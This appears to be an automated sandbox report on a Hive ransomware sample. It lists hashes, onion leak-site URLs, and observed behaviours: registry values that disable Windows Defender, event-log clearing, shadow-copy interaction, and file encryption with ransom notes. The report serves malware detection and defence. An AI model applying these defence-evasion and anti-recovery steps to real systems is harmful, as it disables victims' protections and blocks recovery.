Analysis
-
max time kernel
145s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
07-01-2025 15:59
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe
-
Size
3.3MB
-
MD5
6c1444d0e1c63881918fdd4d60d54f9d
-
SHA1
408db71f315ae43204f1a34b6f28c5ac51d5507b
-
SHA256
d7fe04c042782df6be1fb3e38f171631820e43b9472da93af7e5f49b550a2a33
-
SHA512
bacf08c9d9c93495f01356589249dba5d5b8588acb7f00eb7d92e784875ef9610e37687ff32233c49f862f5564c6cf1fe0643ea8179a3e1be98eec65485525c1
-
SSDEEP
49152:uVcQjH6VIOIgQFF3KzfKeSQSqFvVqp/kHzQJqEFH1D1R:uVpjK7xWF34fSQSqFvVqpcfE
Malware Config
Extracted
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\wFLb_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 1604 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Hive family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 2416 wevtutil.exe 2020 wevtutil.exe 1648 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
pid Process 1968 powershell.exe 3044 powershell.exe -
Modifies Security services 2 TTPs 6 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_2cHT-L6Ndos0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_pJ92OMQmaUE0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\css\currency.css JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_1GYAkZbKR800.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0227419.JPG.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_MZfwi9P-VWc0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_04.MID.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_yscPjhp-sKk0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0195534.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_oR-UG5IgJ7o0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Common Files\System\en-US\wab32res.dll.mui JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_LWQ3BQXEhUM0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_ytDWlHypuRk0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_ZUMEGT-5OlY0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN086.XML.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_6CeUinH4hgM0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_2y6V6TKHMxA0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_-Rvx_Uj4xzc0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AFTRNOON\AFTRNOON.ELM.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_hrtxwax8bTo0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_BfUVn2eDuDY0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_8Szft46vQcc0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00247_.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_qgRpB8DL8TM0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14656_.GIF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_NeFWcBaJCf40.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_uu9PAp7FBNI0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_w7MvzGa49cE0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_ta1eSFe12ZM0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00641_.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_Tn-doqfe8m00.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00126_.GIF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_JqyX4UnQa_k0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_yj05F228Hz80.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0213449.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_uVD_PQTuojg0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\wFLb_HOW_TO_DECRYPT.txt JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Adelaide.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_MXvQXPpeID00.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\ContentDirectory.xml JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\currency.html JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryLetter.dotx.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_lHkm_6tXtrU0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_xl5bCgdPl8U0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0295241.GIF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_PhpRce2Aim80.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR50F.GIF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_iQtzAZy-nWw0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIGN.XML.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_qagikwoymu80.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBLINK.POC.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_AxVMyhdP42s0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR28F.GIF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_w0cn6AQFhmc0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\CAMERA.WAV.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_JYM1u4ICsAE0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\setup_wm.exe.mui JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_Gb3aqqk9_Vk0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_djx_oq8-KK40.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_zZTRRoXc1Wc0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_cfHLTdN88HA0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_flyout.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_UCztYy7NIDE0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_psaJuYw285A0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTaskIcon.jpg.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_JEXYv02AeLU0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_down.png JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_-bFpMt1Pcbw0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_oC60l-W0-vI0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_IM0hPzIg5gk0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_mh6wnOjyjLM0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01148_.WMF.nP1ind8tqMePfgzTqykx1bH5FYVHkX0rxwocjkuGdxf_VuHc3BMrXpY0.euq5i JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2220 sc.exe 2748 sc.exe 2728 sc.exe 1404 sc.exe 2820 sc.exe 2944 sc.exe 2780 sc.exe 2940 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1852 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1968 powershell.exe 3044 powershell.exe 2356 JaffaCakes118_6c1444d0e1c63881918fdd4d60d54f9d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2416 wevtutil.exe Token: SeBackupPrivilege 2416 wevtutil.exe Token: SeSecurityPrivilege 2020 wevtutil.exe Token: SeBackupPrivilege 2020 wevtutil.exe Token: SeSecurityPrivilege 1648 wevtutil.exe Token: SeBackupPrivilege 1648 wevtutil.exe Token: SeIncreaseQuotaPrivilege 560 wmic.exe Token: SeSecurityPrivilege 560 wmic.exe Token: SeTakeOwnershipPrivilege 560 wmic.exe Token: SeLoadDriverPrivilege 560 wmic.exe Token: SeSystemProfilePrivilege 560 wmic.exe Token: SeSystemtimePrivilege 560 wmic.exe Token: SeProfSingleProcessPrivilege 560 wmic.exe Token: SeIncBasePriorityPrivilege 560 wmic.exe Token: SeCreatePagefilePrivilege 560 wmic.exe Token: SeBackupPrivilege 560 wmic.exe Token: SeRestorePrivilege 560 wmic.exe Token: SeShutdownPrivilege 560 wmic.exe Token: SeDebugPrivilege 560 wmic.exe Token: SeSystemEnvironmentPrivilege 560 wmic.exe Token: SeRemoteShutdownPrivilege 560 wmic.exe Token: SeUndockPrivilege 560 wmic.exe Token: SeManageVolumePrivilege 560 wmic.exe Token: 33 560 wmic.exe Token: 34 560 wmic.exe Token: 35 560 wmic.exe Token: SeIncreaseQuotaPrivilege 320 wmic.exe Token: SeSecurityPrivilege 320 wmic.exe Token: SeTakeOwnershipPrivilege 320 wmic.exe Token: SeLoadDriverPrivilege 320 wmic.exe Token: SeSystemProfilePrivilege 320 wmic.exe Token: SeSystemtimePrivilege 320 wmic.exe Token: SeProfSingleProcessPrivilege 320 wmic.exe Token: SeIncBasePriorityPrivilege 320 wmic.exe Token: SeCreatePagefilePrivilege 320 wmic.exe Token: SeBackupPrivilege 320 wmic.exe Token: SeRestorePrivilege 320 wmic.exe Token: SeShutdownPrivilege 320 wmic.exe Token: SeDebugPrivilege 320 wmic.exe Token: SeSystemEnvironmentPrivilege 320 wmic.exe Token: SeRemoteShutdownPrivilege 320 wmic.exe Token: SeUndockPrivilege 320 wmic.exe Token: SeManageVolumePrivilege 320 wmic.exe Token: 33 320 wmic.exe Token: 34 320 wmic.exe Token: 35 320 wmic.exe Token: SeIncreaseQuotaPrivilege 320 wmic.exe Token: SeSecurityPrivilege 320 wmic.exe Token: SeTakeOwnershipPrivilege 320 wmic.exe Token: SeLoadDriverPrivilege 320 wmic.exe Token: SeSystemProfilePrivilege 320 wmic.exe Token: SeSystemtimePrivilege 320 wmic.exe Token: SeProfSingleProcessPrivilege 320 wmic.exe Token: 